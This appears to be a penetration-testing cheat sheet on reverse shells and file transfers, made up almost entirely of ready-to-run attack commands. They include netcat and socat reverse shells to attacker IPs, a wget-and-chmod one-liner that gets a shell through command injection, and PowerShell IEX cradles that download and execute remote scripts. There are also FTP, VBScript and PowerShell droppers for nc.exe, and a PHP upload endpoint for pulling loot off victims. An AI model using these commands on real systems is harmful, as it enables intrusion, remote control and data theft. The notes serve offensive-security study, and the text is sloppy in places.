Module 16 (File Transfers)
Generating reverse shell commands
attcker machen
nc -nvlp 4444 -e /bin/bash
victim
nc -nv 192.168.x.x 4444

Upgrading the shell
python -c 'import pty; pty.spawn("/bin/bash")'
#using arrows
#Ctrl + z
stty raw -echo
fg
# In reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
*Linux to Windows
#from Linux to Windows
#Local
(new-object system.net.webclient).downloadstring('http://192.168.1.1/powerview.ps1') | IEX
#Remotly
(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') | IEX
*Windows to Linux
scp local_file username@hostname_or_ip:/remote/path
#Example
scp 20240830124156_BloodHound.zip kali@10.50.57.149:/var/www/uploads
Method 1: Python pty module
One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty. The pty module let’s you spawn a psuedo-terminal that can fool commands like su
into thinking they are being executed in a proper terminal. To upgrade a dumb shell, simply run the following command:
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo
Method 2: Using socat
socat is like netcat on steroids and is a very powerfull networking swiss-army knife. Socat can be used to pass full TTY’s over TCP connections.
If socat
is installed on the victim server, you can launch a reverse shell with it. You must catch the connection with socat
as well to get the full functions.
The following commands will yield a fully interactive TTY reverse shell:
On Kali (listen):
socat file:`tty`,raw,echo=0 tcp-listen:4444
On Victim (launch):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
With a command injection vuln, it’s possible to download the correct architecture socat
binary to a writable directoy, chmod it, then execute a reverse shell in one line:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.10:4444
Windows File transfer
sudo apt update && sudo apt install pure-ftpd
FTP configurations.
#!/bin/bash
if [[ $(/usr/bin/id -u) -ne 0 ]]; then
echo "Not running as root"
exit
fi
sudo apt update && sudo apt install pure-ftpd
sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null -s /etc ftpuser
sudo pure-pw useradd limbo -u ftpuser -d /ftphome
sudo pure-pw mkdb
cd /etc/pure-ftpd/auth/
sudo ln -s ../conf/PureDB 60pdb
sudo mkdir -p /ftphome
sudo chown -R ftpuser:ftpgroup /ftphome/
sudo systemctl restart pure-ftpd
FTPd file commands
echo open 192.168.1.10>> ftp.txt
echo USER hacktor>> ftp.txt
echo hacktor>> ftp.txt
echo bin>> ftp.txt
echo GET nc.exe>> ftp.txt
echo bye>> ftp.txt
#How to run it
ftp -v -n -s:ftp.txt
#Fixing time out problem Code:
echo "40110 40210" | sudo tee /etc/pure-ftpd/conf/PassivePortRange
sudo service pure-ftpd restart
VBScript to download files
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
#How to run it
[code]
cscript wget.vbs http://192.168.1.10/evil.txt evil.txt
upx -9 nc.exe
sudo exe2hex -x nc.exe -p nc.cmd
Power shell commands to download files
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.1.10/shell" >>wget.ps1
echo $file = "shell" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
[code]
#How to run it
[code]
powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
[code]
#Powersehll In one line
[code]
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.10/upload.php', 'pass.txt')
[code]
#On Fly command --> Run powershell script without downloading it on the hard disk
[code]
powershell IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.10/hello.ps1')
[code]
#Uploading files
#Preparing kali upload direcotry
sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads
Save this php code into /var/www/html/
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile) ?>
This is how to use it
powershell (New-Object System.Net.WebClient).UploadFile('http://10.9.0.213/upload.php', 'iexplore.DMP')
Different methods to setup the server for file transfer
To perform the file transfer we need to setup a server, besides using updog.
updog -p 80

wget
We can use the wget command to transfer the file. wget is a powerful command to download files from the web. It should be noted that while doing file transfer using wget in windows, we need to mention the -o (-OutFile) flag in order to save the file. If we do not mention the flag then it will only return it as an object i.e., WebResponseObject. The command for wget in windows is:
powershell wget http://192.168.1.8/ignite.txt -o ignite.txt -o ignite.txt

curl
Curl is a powerful command-line tool, which can be used to transfer files using various networking protocols. Following will be the command to transfer the file:
curl http://192.168.31.141/ignite.txt -o ignite.txt

To setup a server using PHP, we can use the following command:
php -S 0.0.0.0:8081

To setup a server using python2, we can use the following command:
python2 -m SimpleHTTPServer 80

To setup a server using python3, we can use the following command:
python3 -m http.server 8000

File transfer using Netcat
Netcat, commonly known as nc, is a multifunctional networking tool designed for reading from and writing to network connections over TCP or UDP. Netcat can facilitate file transfers by establishing a simple client-server setup.
To transfer file in the kali machine from an Ubuntu machine we can use the following command inside kali:
nc -lvp 5555 > file.txt

Now wSimilarly, we can also receive files from a windows machine inside our kali linux. However, it should be noted that we the target windows machine should have the nc.exe binary to make this method work.
Following is the command we need to run on the windows machine:
nc.exe 192.168.31.141 5555 < data.txt

To receive the file in the kali machine, we will run the following command:
nc -lvp 5555 > data.txt
cat data.txt

PSCP (Windows to linux)
sudo apt install putty-tools
sudo pscp Administrator@<IP_WIN>:/Users/Administrator/Downloads/20240806021013_loot.zip ~/PATH/To/Savefile-in_Lnux/

Last updated